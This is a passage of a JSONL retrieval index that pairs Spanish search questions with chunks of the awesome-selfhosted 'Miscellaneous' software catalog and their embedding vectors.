-0.03185]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Digiquiz β€” An online application to publish content created with H5P (documentation in French) [AGPL-3.0, Nodejs]. Digiread β€” Clean up online pages and articles using Mozilla's Readability (documentation in French) [⚠, AGPL-3.0, Nodejs/PHP]. Digisteps β€” A simple application for creating online educational paths (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digitranscode β€” Convert audio files and videos directly in the browser (documentation in French) [AGPL-3.0, Nodejs]. Digiview β€” View YouTube videos in a distraction-free interface (documentation in French) [⚠, AGPL-3.0, Nodejs/PHP]. Digiwords β€” A simple online application for creating word clouds (documentation in French) [AGPL-3.0, Nodejs/PHP]. DOCAT β€” Host your docs. Simple. Versioned. Fancy [MIT, Python/Docker]. Domain Locker β€” Domain name portfolio management and tracker [MIT, Deno/Docker]. DOMJudge β€” System for running a programming contest, like the ICPC regional and world championship programming contests [GPL-2.0/BSD-3-Clause/MIT, PHP].", "indexar": "que programa hay para crear un concurso de programaciΓ³n en lΓ­nea", "v": [-0.01217, 0.02715, -0.09802, -0.22707, 0.03222, -0.17205, 0.02862, 0.0707, -0.14317, -0.08902, -0.01051, 0.00747, -0.00504, -0.10086, -0.06652, 0.02713, 0.03763, -0.08024, 0.12475, 0.03883, -0.05151, 0.07087, -0.04052, 0.00182, -0.04304, -0.04559, 0.04989, -0.05677, -0.01406, 0.00066, 0.01227, 0.07332, 0.1621, -0.03905, 0.01787, -0.02172, 0.10126, 0.06007, -0.00883, 0.06536, -0.01925, 0.02258, -0.05016, 0.07102, -0.01126, -0.04272, 0.12018, 0.03676, -0.00157, -0.08515, 0.00962, 0.09262, 0.04737, 0.01481, 0.12554, -0.09822, -0.09771, -0.11478, -0.07413, -0.09634, 0.00902, -0.06328, -0.00478, -0.0738, 0.02234, 0.07408, 0.08482, -0.03828, -0.04057, -0.00494, 0.02933, 0.0157, -0.05699, -0.0673, 0.05526, 0.0326, -0.06901, -0.09389, 0.02166, -0.0455, -0.0823, 0.01448, 0.04811, 0.09935, -0.0853, -0.03381, 0.03646, 0.01494, -0.04249, -0.01992, 0.02597, 0.02163, -0.03817, 0.13027, 0.01639, -0.08627, 0.17252, -0.04178, 0.08382, 0.04295, -0.01375, -0.17156, -0.15491, 0.07189, -0.10383, 0.15019, 0.13358, -0.01613, -0.00361, 0.08802, 0.02865, -0.11578, 0.0016, -0.01167, -0.06203, -0.03219, 0.07714, 0.02146, 0.08057, -0.05218, -0.06933, 0.0594, -0.00449, 0.03437, 0.11784, 0.04557, 0.02535, 0.0998, -0.04902, 0.03008, -0.00334, 0.03137, -0.065, -0.02451, -0.05906, -0.02295, 0.01039, 0.02595, 0.05517, -0.06777, -0.00239, 0.04476, -0.04312, -0.01533, -0.05065, 0.00898, -0.057, -0.1524, -0.07789, 0.04746, -0.01332, 0.01759, -0.04196, 0.09712, -0.09729, 0.00718, 0.00194, 0.01501, -0.03617, 0.03407, -0.10881, 0.01387, -0.06208, -0.10148, 0.0227, -0.01372, -0.04482, 0.01271, 0.06634, 0.04492, -0.04735, 0.08546, 0.01307, -0.09234, -0.02094, -0.01084, -0.02547, -0.07213, 0.01095, -0.06894, -0.10955, 0.02466, 0.04973, -0.02443, -0.01349, -0.05858, 0.00784, 0.01098, -0.00739, 0.02459, -0.02159, 0.00831, -0.06913, 0.06972, 0.01566, 0.00162, -0.01819, 0.00154, 0.04998, -0.04466, -0.09639, 0.0084, 0.0139, -0.03482, -0.00398, 0.09132, -0.0111, 0.01411, 0.04114, 0.10178, 0.05461, -0.11775, 0.01039, 0.02182, -0.01935, 0.02734, 0.04725, 0.00355, 0.08522, 0.01949, -0.02367, -0.02154, -0.00095, 0.07577, -0.02734, -0.06425, 0.00881, 0.00605, 0.04865, 0.04183, -0.02828, -0.10495, -0.03876, -0.06038, 0.05415, 0.02975, 0.00913, -0.02191, 0.02187, -0.05319, -0.04112, 0.08842, -0.05298, -0.0575, -0.01585, -0.0134, -0.02614, 0.0083, 0.00839, -0.01565, -0.05276, -0.0037, 0.02263, -0.02716, 0.02142, 0.03486]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Digiquiz β€” An online application to publish content created with H5P (documentation in French) [AGPL-3.0, Nodejs]. Digiread β€” Clean up online pages and articles using Mozilla's Readability (documentation in French) [⚠, AGPL-3.0, Nodejs/PHP]. Digisteps β€” A simple application for creating online educational paths (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digitranscode β€” Convert audio files and videos directly in the browser (documentation in French) [AGPL-3.0, Nodejs]. Digiview β€” View YouTube videos in a distraction-free interface (documentation in French) [⚠, AGPL-3.0, Nodejs/PHP]. Digiwords β€” A simple online application for creating word clouds (documentation in French) [AGPL-3.0, Nodejs/PHP]. DOCAT β€” Host your docs. Simple. Versioned. Fancy [MIT, Python/Docker]. Domain Locker β€” Domain name portfolio management and tracker [MIT, Deno/Docker]. DOMJudge β€” System for running a programming contest, like the ICPC regional and world championship programming contests [GPL-2.0/BSD-3-Clause/MIT, PHP].", "indexar": "con que puedo convertir archivos de video directamente desde el navegador", "v": [0.01574, -0.03205, -0.07648, -0.11323, -0.09561, -0.03511, 0.10885, 0.02229, 0.06265, -0.22986, -0.01356, -0.16274, -0.028, -0.04666, -0.00773, 0.0971, 0.13279, -0.03457, 0.11257, -0.02039, 0.08063, -0.05148, 0.04106, -0.07392, 0.09199, 0.00442, -0.06307, 0.11276, -0.07568, -0.1482, -0.12048, -0.05164, 0.04772, 0.05422, -0.0224, 0.03754, 0.1036, 0.1228, -0.0582, 0.01501, -0.00834, 0.04031, -0.07853, 0.08794, -0.04929, -0.03921, 0.06611, -0.08766, -0.03168, -0.1191, 0.02406, 0.00337, -0.15228, 0.07076, -0.11611, -0.02687, 0.0358, -0.18382, 0.08033, -0.03077, 0.05315, 0.04999, -0.01113, 0.03381, -0.07055, 0.0582, -0.04937, 0.04588, -0.08846, 0.03715, -0.01933, 0.02937, 0.03975, 0.06762, -0.06372, 0.06527, -0.00988, 0.00935, -0.02029, 0.02654, 0.0926, -0.04992, 0.00028, -0.02928, -0.0145, -0.01999, -0.06884, 0.02507, 0.08316, -0.12833, 0.06205, 0.08151, 0.03922, -0.05193, -0.00477, -0.08367, 0.05382, -0.03567, -0.01177, -0.10567, -0.0524, 0.00457, -0.02993, 0.18184, 0.14313, 0.05661, 0.07814, -0.01697, -0.07812, 0.0052, 0.11, 0.03644, -0.03831, -0.00463, -0.0246, 0.10929, -0.06385, -0.06709, -0.06393, -0.06065, -0.07405, -0.03363, -0.13526, -0.03899, -0.01112, 0.03389, -0.01194, 0.0332, -0.09914, 0.05744, 0.03841, -0.03848, -0.04847, -0.02128, -0.01548, -0.02095, 0.05217, 0.03066, -0.00758, -0.02971, 0.10635, -0.01238, 0.02557, 0.03607, 0.10769, -0.08966, -0.02273, -0.04867, -0.09225, -0.14053, 0.00089, -0.08263, -0.03164, -0.0775, -0.00576, 0.08511, -0.03633, -0.08283, -0.02534, 0.04589, -0.00252, 0.07023, -0.04674, -0.01654, -0.04274, -0.0557, -0.09601, 0.04049, 0.02356, 0.00752, 0.02889, 0.01805, 0.02414, -0.07802, -0.01192, 0.0612, -0.00685, -0.00853, 0.02113, -0.05141, 0.00725, 0.00368, -0.04243, 0.03168, -0.03296, -0.04935, 0.08597, 0.03812, -0.10441, 0.06584, -0.04414, 0.04529, -0.05031, -0.00308, 0.04189, -0.03292, -0.08509, 0.01881, -0.06889, -0.00306, 0.00998, -0.053, -0.02056, 0.03193, -0.02917, -0.0027, 0.00191, -0.02904, 0.04902, -0.0415, -0.03615, -0.01162, 0.05862, -0.0247, 0.07025, -0.00934, 0.04691, 0.04238, -0.02537, 0.02319, 0.0326, -0.0187, 0.03913, -0.06188, 0.01118, 0.03963, 0.01628, 0.01612, -0.12386, -0.02075, -0.0467, 0.0092, -0.05573, -0.03184, 0.02331, 0.03445, -0.02454, 0.00732, -0.06897, 0.03041, 0.02789, 0.05835, 0.01507, 0.00896, -0.04348, -0.02096, -0.05999, 0.00214, 0.07833, -0.05322, 0.00457, 0.06299, 0.01563, 0.03145, -0.05512, 0.01939]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Digiquiz β€” An online application to publish content created with H5P (documentation in French) [AGPL-3.0, Nodejs]. Digiread β€” Clean up online pages and articles using Mozilla's Readability (documentation in French) [⚠, AGPL-3.0, Nodejs/PHP]. Digisteps β€” A simple application for creating online educational paths (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digitranscode β€” Convert audio files and videos directly in the browser (documentation in French) [AGPL-3.0, Nodejs]. Digiview β€” View YouTube videos in a distraction-free interface (documentation in French) [⚠, AGPL-3.0, Nodejs/PHP]. Digiwords β€” A simple online application for creating word clouds (documentation in French) [AGPL-3.0, Nodejs/PHP]. DOCAT β€” Host your docs. Simple. Versioned. Fancy [MIT, Python/Docker]. Domain Locker β€” Domain name portfolio management and tracker [MIT, Deno/Docker]. DOMJudge β€” System for running a programming contest, like the ICPC regional and world championship programming contests [GPL-2.0/BSD-3-Clause/MIT, PHP].", "indexar": "cual es una alternativa libre para publicar documentaciΓ³n de forma sencilla", "v": [-0.04542, 0.15507, -0.13333, -0.09612, -0.01834, -0.1642, 0.0155, -0.08264, -0.21365, -0.00363, -0.05593, -0.22159, 0.02309, -0.04812, 0.06579, -0.06552, 0.08072, -0.18301, 0.08178, -0.00429, -0.02977, -0.02035, -0.10419, -0.08622, -0.06201, -0.11276, 0.01979, -0.03198, -0.02949, -0.02231, 0.01452, 0.0244, -0.04127, 0.02197, -0.04186, 0.12803, 0.11776, 0.01266, -0.02508, -0.0395, -0.00135, -0.08233, -0.01825, 0.15797, -0.13753, -0.02271, -0.03997, 0.03325, -0.05908, 0.02202, 0.02056, -0.02351, -0.07748, 0.05503, -0.02496, -0.05061, 0.17614, -0.16838, -0.06671, -0.06029, -0.00323, 0.13045, -0.01867, -0.02543, 0.01967, 0.02688, 0.00187, 0.03016, -0.06821, 0.03603, 0.08707, -0.08566, 0.06893, -0.07511, -0.17911, -0.0002, -0.18428, -0.08774, -0.06001, 0.08044, 0.02622, -0.07703, -0.00456, 0.02656, 0.02247, -0.06484, 0.02747, -0.07353, 0.03216, 0.04377, 0.07385, -0.05055, -0.03358, 0.05544, 0.01378, -0.09215, 0.00569, 0.06217, -0.01748, -0.00561, -0.06671, 0.04731, -0.10218, -0.03281, -0.05749, -0.09669, -0.05753, -0.00034, -0.12675, 0.02604, 0.038, 0.04546, -0.03908, 0.07915, -0.05063, -0.00736, -0.00564, 0.06219, -0.01423, -0.0436, 0.03612, -0.04416, -0.08743, -0.06894, 0.09378, 0.01809, 0.01846, 0.01204, -0.02843, 0.09044, 0.07415, -0.0155, -0.08364, -0.00913, -0.06545, 0.00768, 0.02207, -0.08593, -0.0311, -0.08667, 0.00079, -0.04766, -0.08199, -0.10091, -0.03558, -0.06689, 0.01013, -0.01371, -0.05552, -0.03197, -0.01914, -0.02859, -0.03061, 0.09162, -0.03205, 0.00096, 0.04239, 0.01081, -0.07503, 0.01535, 0.02811, 0.01839, -0.04127, 0.02354, 0.03679, 0.00205, -0.03599, -0.07734, -0.07922, -0.04547, 0.03805, 0.02517, 0.06537, -0.07672, 0.09551, -0.1135, -0.10005, -0.06042, -0.00556, 0.00226, 0.0055, 0.02067, -0.09176, 0.02958, 0.01438, -0.0413, 0.03869, -0.02494, 0.00903, -0.02436, -0.00736, 0.01715, -0.03378, -0.02933, -0.00726, -0.0093, -0.00365, -0.10991, -0.00515, -0.03519, -0.07902, -0.05198, -0.01102, 0.0134, -0.03251, 0.03239, -0.07223, 0.01249, -0.00669, 0.06012, 0.0461, 0.00333, 0.07112, 0.0004, -0.06337, 0.01535, 0.01006, -0.07559, -0.01243, 0.02884, 0.0539, 0.01155, 0.03411, 0.00237, 0.04512, -0.01015, 0.05196, 0.02341, -0.02803, 0.00806, 0.01302, 0.01219, 0.02493, 0.02918, -0.00252, 0.01473, 0.02148, 0.00456, -0.03178, 0.0068, 0.06391, 0.02307, -0.01676, 0.02612, -0.00966, -0.00544, -0.05567, -0.00682, -0.02895, -0.07252, -0.00057, 0.01909, 0.04952, -0.00951, 0.02267, -0.05538]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: ESMira β€” Run longitudinal studies (ESM, AA, EMA) with data collection and communication with participants being completely anonymous [AGPL-3.0, PHP]. F-Droid β€” Server tools for maintaining an F-Droid repository system [AGPL-3.0, Python/Docker/deb]. Flyimg β€” Resize and crop images on the fly. Get optimised images with MozJPEG, WebP or PNG using ImageMagick, with an efficient caching system [MIT, Docker]. Geeftlist β€” Collaborative platform for managing, sharing and reserving gifts between friends and family [GPL-3.0, Docker]. google-webfonts-helper β€” Hassle-Free Way to Self-Host Google Fonts. Get eot, ttf, svg, woff and woff2 files + CSS snippets [⚠, MIT, Nodejs]. Habitica β€” Habit tracker app which treats your goals like a Role Playing Game [GPL-3.0/CC-BY-SA-3.0, Nodejs/Docker]. HortusFox β€” Collaborative plant management and tracking system for plant enthusiasts [MIT, PHP/Docker].", "indexar": "que programa hay para realizar estudios longitudinales de forma anΓ³nima?", "v": [0.22361, 0.11499, -0.02419, -0.04376, 0.11012, -0.01429, -0.02045, -0.06297, -0.20137, -0.03538, 0.0224, -0.0549, 0.05048, -0.06783, -0.04287, -0.03472, 0.06937, -0.09296, -0.00981, 0.06752, -0.10601, -0.03029, -0.0866, 0.08279, -0.09172, -0.04201, 0.0632, -0.13857, 0.13267, 0.00558, -0.05447, 0.09783, -0.00997, -0.04114, -0.0662, 0.0115, 0.05473, 0.00692, -0.06196, 0.06759, 0.05357, -0.05368, 0.02655, 0.02535, 0.07289, 0.02682, -0.00296, 0.01528, 0.00636, -0.00588, -0.00401, 0.14622, 0.03478, 0.02994, 0.11367, -0.07068, -0.04268, -0.22245, -0.0821, -0.04297, 0.08927, 0.04185, 0.05788, -0.01694, 0.12152, -0.05067, 0.122, -0.00916, -0.07642, 0.04325, 0.00863, -0.02132, 0.0421, 0.00341, -0.00873, 0.0599, -0.11807, -0.03456, 0.09968, -0.06169, -0.01528, -0.03105, -0.0585, 0.10316, -0.05625, 0.06498, -0.04853, -0.02544, -0.03208, -0.04645, 0.00824, 0.05902, -0.06686, 0.09495, 0.0211, -0.09637, 0.01241, 0.04076, 0.01111, -0.00155, 0.07135, 0.04208, -0.04863, 0.14717, -0.03859, 0.10646, -0.10268, -0.02808, -0.03937, 0.09818, -0.02233, 0.04139, -0.07877, -0.04076, -0.10161, -0.04676, -0.04881, 0.00839, 0.06598, -0.09084, -0.06332, 0.04017, -0.08561, 0.04691, -0.00775, -0.0505, -0.06557, 0.06332, 0.02412, 0.11624, 0.03317, 0.07028, -0.0681, -0.06141, -0.07018, -0.02466, 0.06025, -0.05964, 0.00979, -0.14693, 0.0353, 0.07591, -0.02507, -0.01909, 0.02617, -0.0471, -0.03744, -0.0592, -0.00397, -0.06334, -0.01869, 0.01303, -0.01095, 0.08708, -0.03748, -0.04644, 0.02556, -0.04739, -0.05732, 0.03473, -0.05796, 0.0482, 0.03269, -0.08473, 0.11753, -0.08817, 0.03801, 0.00818, 0.04555, 0.06057, -0.01089, 0.01946, 0.06687, -0.09278, 0.05818, 0.04224, -0.04043, -0.11013, 0.00159, -0.03561, -0.10038, 0.03774, 0.0242, -0.04052, -0.00279, -0.00486, -0.00693, 0.04153, 0.03229, -0.04089, 0.06315, -0.06125, -0.04996, 0.00686, 0.02423, 0.03445, 0.02588, 0.00901, 0.07237, -0.02587, -0.0852, -0.00996, 0.02141, 0.01164, 0.02912, 0.08453, 0.00163, -0.04329, 0.07202, 0.08528, 0.00038, -0.05496, 0.0264, -0.02774, 0.0419, 0.02432, 0.02778, 0.04497, 0.03156, 0.08414, -0.07847, -0.00947, 0.04385, 0.11925, 0.00634, -0.01734, 0.11717, 0.06278, -0.01232, -0.01372, -0.03491, -0.05697, 0.01845, -0.07118, 0.05719, 0.00581, 0.00178, -0.03005, 0.00893, -0.04383, 0.0108, 0.01636, 0.02425, 0.01121, -0.03836, -0.02937, -0.08033, 0.00133, -0.04132, -0.03954, -0.03216, 0.03408, -0.01554, -0.04156, 0.05637, 0.06971]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: ESMira β€” Run longitudinal studies (ESM, AA, EMA) with data collection and communication with participants being completely anonymous [AGPL-3.0, PHP]. F-Droid β€” Server tools for maintaining an F-Droid repository system [AGPL-3.0, Python/Docker/deb]. Flyimg β€” Resize and crop images on the fly. Get optimised images with MozJPEG, WebP or PNG using ImageMagick, with an efficient caching system [MIT, Docker]. Geeftlist β€” Collaborative platform for managing, sharing and reserving gifts between friends and family [GPL-3.0, Docker]. google-webfonts-helper β€” Hassle-Free Way to Self-Host Google Fonts. Get eot, ttf, svg, woff and woff2 files + CSS snippets [⚠, MIT, Nodejs]. Habitica β€” Habit tracker app which treats your goals like a Role Playing Game [GPL-3.0/CC-BY-SA-3.0, Nodejs/Docker]. HortusFox β€” Collaborative plant management and tracking system for plant enthusiasts [MIT, PHP/Docker].", "indexar": "con quΓ© puedo montar un sistema colaborativo para gestionar regalos entre amigos y familia?", "v": [0.15287, 0.16737, -0.12494, -0.13453, -0.12014, -0.02952, 0.02704, 0.0953, -0.0914, -0.23686, -0.04528, -0.08305, 0.05819, -0.02891, 0.0713, 0.05506, 0.13627, 0.02036, -0.03612, 0.0104, 0.01338, -0.00054, -0.0382, -0.115, 0.06076, -0.0546, 0.0654, -0.08327, -0.07809, 0.1855, 0.08725, -0.00544, 0.0373, -0.05061, -0.05972, 0.01391, 0.05149, 0.03547, 0.04893, -0.1029, -0.05929, -0.02959, -0.03636, -0.04039, 0.03984, 0.0291, -0.03941, -0.08184, -0.02294, 0.00612, -0.06544, -0.12364, -0.0382, -0.0633, -0.03915, -0.02751, 0.10271, -0.15467, 0.06628, -0.01137, -0.10392, 0.06538, -0.02999, 0.04794, 0.02171, -0.0014, -0.04513, -0.05606, -0.11016, 0.0824, 0.03432, -0.04006, -0.01431, -0.02852, -0.01653, 0.08509, 0.09556, 0.04123, 0.0702, 0.0008, 0.07384, 0.03759, 0.05134, 0.05493, 0.103, -0.05443, 0.04947, -0.01897, 0.06682, -0.02173, 0.00591, -0.0061, 0.05975, -0.05152, -0.0022, 0.00366, 0.06606, 0.02273, -0.0646, 0.094, -0.02025, -0.06211, -0.1357, 0.08938, -0.04945, -0.0036, 0.01863, 0.01669, 0.04698, -0.05516, -0.03157, 0.05427, 0.0279, -0.01261, -0.03303, 0.00166, 0.02111, 0.02109, -0.01162, 0.02324, -0.10581, 0.07484, 0.06335, -0.01439, 0.05357, 0.01319, 0.0877, 0.11206, 0.00637, 0.06425, -0.0827, 0.02164, -0.04625, -0.02567, 0.02181, -0.00088, -0.08074, 0.03262, -0.09412, -0.11025, 0.0695, 0.01695, 0.0448, -0.08886, 0.08766, 0.01038, 0.05373, -0.03117, 0.06711, 0.05574, 0.02295, 0.06333, -0.00016, -0.06509, -0.01627, -0.00662, 0.01793, -0.04168, 0.01544, -0.0107, 0.06311, 0.02989, 0.04125, 0.05384, -0.06907, -0.01631, -0.02773, -0.01019, -0.00719, -0.02261, -0.06431, 0.02667, 0.0204, 0.04687, 0.0765, -0.06354, -0.04401, -0.12743, -0.00051, -0.00583, -0.09879, 0.06094, -0.00846, 0.03096, -0.02987, 0.01957, -0.01276, 0.09875, 0.00337, 0.00501, 0.01051, 0.03013, 0.01624, 0.02913, 0.05088, -0.07562, -0.02211, -0.05231, 0.05824, 0.05451, 0.0097, 0.01268, 0.10246, -0.08574, -0.01919, 0.02204, -0.01103, 0.09014, 0.11964, 0.1158, 0.04566, -0.01088, 0.04465, -0.00956, -0.06513, 0.03961, -0.06817, -0.00041, 0.03321, 0.05995, 0.02836, 0.05181, 0.03819, -0.04081, 0.02768, 0.03101, 0.01282, 0.03461, 0.02295, -0.0738, -0.01076, -0.08117, 0.02942, -0.01936, 0.03633, -0.04083, 0.02534, 0.00783, 0.01909, 0.02737, 0.09746, 0.03905, 0.02643, -0.03084, -0.12397, -0.11372, -0.07871, 0.04181, 0.00222, -0.11638, -0.05435, 0.02158, -0.02323, -0.12966, -0.00914, -0.04379]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: ESMira β€” Run longitudinal studies (ESM, AA, EMA) with data collection and communication with participants being completely anonymous [AGPL-3.0, PHP]. F-Droid β€” Server tools for maintaining an F-Droid repository system [AGPL-3.0, Python/Docker/deb]. Flyimg β€” Resize and crop images on the fly. Get optimised images with MozJPEG, WebP or PNG using ImageMagick, with an efficient caching system [MIT, Docker]. Geeftlist β€” Collaborative platform for managing, sharing and reserving gifts between friends and family [GPL-3.0, Docker]. google-webfonts-helper β€” Hassle-Free Way to Self-Host Google Fonts. Get eot, ttf, svg, woff and woff2 files + CSS snippets [⚠, MIT, Nodejs]. Habitica β€” Habit tracker app which treats your goals like a Role Playing Game [GPL-3.0/CC-BY-SA-3.0, Nodejs/Docker]. HortusFox β€” Collaborative plant management and tracking system for plant enthusiasts [MIT, PHP/Docker].", "indexar": "cual es una alternativa libre a las herramientas de F-Droid para mantener repositorios?", "v": [-0.01063, 0.02237, -0.08573, -0.05615, 0.01182, 0.05608, -0.01901, -0.01028, -0.10924, -0.02972, -0.05823, -0.16956, -0.05097, -0.16721, 0.14483, -0.10221, 0.07821, -0.13407, -0.02688, -0.00676, -0.12995, -0.01118, -0.10396, -0.04133, -0.01369, -0.07397, 0.0629, 0.03422, -0.22926, 0.03881, 0.15219, -0.01033, 0.10929, 0.0288, -0.08476, 0.02963, 0.16913, 0.15645, 0.09524, 0.01553, -0.02192, -0.03454, -0.02996, 0.08734, -0.01998, -0.08012, -0.02474, -0.00497, 0.01887, 0.15264, -0.01668, -0.10164, 0.05305, -0.00056, 0.06881, -0.12937, 0.17388, -0.19422, -0.07614, -0.04837, -0.12531, -0.01459, 0.04062, -0.04903, -0.04872, -0.07835, -0.01929, -0.03082, -0.08592, 0.11386, 0.06984, -0.04821, 0.04611, -0.02357, -0.16753, 0.03473, -0.00716, -0.03772, -0.02696, 0.05694, -0.04057, -0.09937, -0.02706, 0.07476, -0.04747, -0.11571, 0.12806, -0.03193, -0.00384, -0.00678, 0.0051, 0.04518, -0.07545, 0.03421, 0.08893, -0.05008, 0.03573, 0.08673, -0.01795, -0.03966, 0.09978, 0.02649, -0.03616, -0.04433, 0.01416, 0.00738, 0.00651, 0.09677, -0.09221, 0.03821, 0.00066, 0.05428, 0.04379, 0.03137, -0.00738, 0.01799, -0.0228, -0.00208, 0.0707, -0.06882, 0.04934, -0.04297, -0.05261, -0.04717, 0.08777, 0.01768, 0.03111, 2e-05, -0.04116, -0.01574, 0.05736, -0.08878, -0.04751, -0.0651, -0.01011, -0.0179, 0.08493, -0.06018, -0.02527, -0.01454, 0.04737, -0.01699, -0.00691, -0.04929, 0.04067, -0.07598, -0.01452, -0.00867, 0.05552, -0.05226, -0.06828, -0.04822, 0.07492, 0.07096, -0.04283, 0.03385, -0.04915, -0.01817, -0.09652, 0.02798, 0.05122, -0.04631, 0.07104, -0.01125, -0.05784, -0.00604, 0.06101, 0.0054, -0.05596, 0.0079, 0.04724, 0.13604, 0.05359, -0.08199, 0.02007, -0.02311, 0.018, -0.06314, -0.01266, -0.02636, -0.01881, 0.01335, -0.07674, 0.0493, 0.002, -0.08619, 0.0016, -0.01937, 0.01833, 0.05625, -0.07141, 0.00813, -0.02188, -0.11535, 0.0922, 0.02494, -0.00953, -0.0269, -0.04373, -0.01355, -0.06728, -0.00758, -0.01951, -0.02729, -0.03699, -0.00786, -0.04096, -0.03882, 0.01582, -0.00518, 0.04539, 0.02798, 0.05075, -0.01043, -0.06681, 0.0141, 0.00649, 0.03822, -0.03749, -0.02937, 0.04553, 0.01472, 0.06368, 0.01597, -0.04243, 0.03021, -0.02204, 0.06113, -0.04434, -0.00052, 0.02478, 0.00863, 0.0496, 0.03407, 0.02142, 0.01335, -0.00649, 0.03768, 0.02524, 0.01498, 0.03531, 0.04061, -0.0305, -0.00956, -0.05595, -0.02118, -0.04602, -0.01728, -0.05167, -0.04318, -0.00702, 0.02195, 0.00933, -0.03114, -0.00682, 0.03368]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: ImgCompress β€” Image processing tool that runs entirely in Docker. Compress, convert, resize, batch-process images, and remove backgrounds using local AI without cloud dependencies [GPL-3.0, Docker]. Infisical Community Edition β€” Platform for secrets, certificates, and privileged access management [MIT, Docker/K8S/deb]. iSponsorBlockTV β€” Block and skip sponsors, while also muting and skipping ads on YouTube [⚠, GPL-3.0, Docker/Python]. IT-Tools by sharevb β€” Collection of handy online tools for developers (fork of [it-tools](https://github.com/CorentinTh/it-tools)) [GPL-3.0, Docker]. Jelu β€” Read and to-read list book tracker [MIT, Java/Docker]. jetlog β€” Personal flight tracker and viewer [GPL-2.0, Docker]. Kasm Workspaces β€” Streaming containerized apps and desktops to end-users. Examples include Ubuntu in your browser, or simply single apps such as Chrome, OpenOffice, Gimp, Filezilla etc [GPL-3.0, Docker]. Koillection β€” Koillection is a service allowing users to manage any kind of collections [MIT, Docker/PHP].", "indexar": "que herramienta sirve para comprimir y procesar imΓ‘genes sin usar la nube?", "v": [0.04584, -0.01525, -0.22823, -0.1869, 0.04447, -0.10944, -0.08414, -0.10438, -0.0526, -0.15208, -0.09349, -0.09758, -0.03405, -0.07347, -0.08771, -0.02237, 0.01447, -0.10026, 0.02238, 0.05675, 0.01243, 0.06519, -0.13603, -0.09242, -0.13589, 0.01684, 0.05661, -0.01227, -0.1851, -0.01665, -0.08467, 0.02805, 0.14671, -0.05957, -0.09447, -0.08748, -0.06087, -0.01455, -0.08618, 0.12104, 0.02399, 0.05926, -0.09239, 0.1233, -0.04224, -0.00901, -0.04479, -0.03784, -0.02468, 0.05945, -0.00968, -0.03643, -0.07461, 0.10777, -0.08859, -0.16606, 0.1229, -0.09991, -0.00806, -0.09955, -0.05265, 0.08004, -0.01098, -0.07498, -0.02623, -0.02849, -0.02153, 0.01059, -0.14838, 0.0639, 0.00024, 0.15309, 0.06391, -0.04489, 0.02964, -0.01895, -0.02699, 0.00052, -0.00601, 0.02293, 0.03047, 0.05849, -0.0766, -0.01096, -0.10779, -0.07161, 0.07542, -0.01679, 0.05886, -0.04336, -0.06633, 0.04947, 0.08722, 0.01037, 0.11525, 0.01726, 0.02072, 0.03415, 0.04163, 0.03329, 0.18614, -0.03686, -0.07029, 0.01768, -0.04403, -0.00808, 0.07753, -0.05393, -0.08046, -0.06062, 0.05197, -0.04797, 0.00405, 0.0204, -0.06511, -0.01129, 0.00756, -0.13401, -0.06929, -0.0468, 0.05912, 0.00677, -0.02991, -0.07407, 0.01411, 0.00455, -0.01338, 0.04677, -0.14948, -0.04418, -0.13543, -0.03325, -0.05003, 0.03317, -0.02966, -0.03724, 0.0002, -0.1802, 0.02684, -0.08626, 0.04725, 0.02122, -0.04529, -0.04204, 0.04756, 0.01164, 0.08013, 0.01255, -0.03342, 0.00638, 0.05781, -0.02411, -0.03205, 0.02834, -0.02636, 0.03513, -0.03341, 0.00631, -0.11681, -0.0369, -0.02675, 0.00763, 0.02715, 0.05489, 0.02764, -0.07333, -0.02388, 0.00402, 0.02472, 0.0749, 0.06473, -0.01927, -0.02055, -0.05901, 0.03031, 0.01736, -0.00583, -0.02145, 0.00105, -0.02614, -0.00704, -0.02496, -0.01517, 0.02202, -0.022, 0.01943, -0.00832, -0.02315, -0.06202, 0.07345, -0.02409, 0.02473, -0.02321, -0.02878, 0.09298, -0.02575, -0.06083, -0.03024, 0.05395, -0.01934, -0.04842, 0.02745, -0.07495, -0.0117, -0.00318, 0.00287, -0.01493, 0.02162, -0.01413, 0.00149, -0.00571, 0.01378, -0.01431, -0.03771, 0.01629, -0.00241, 0.04527, -0.01234, -0.05215, -0.02538, 0.00827, 0.02523, 0.03792, 0.01426, 0.01771, 0.07249, -0.02331, 0.03545, -0.01459, -0.05225, 0.00851, 0.03439, -0.01232, -0.04455, -0.01886, -0.02999, 0.03495, -0.01903, -0.03706, -0.06936, -0.03331, 0.03701, -0.03283, 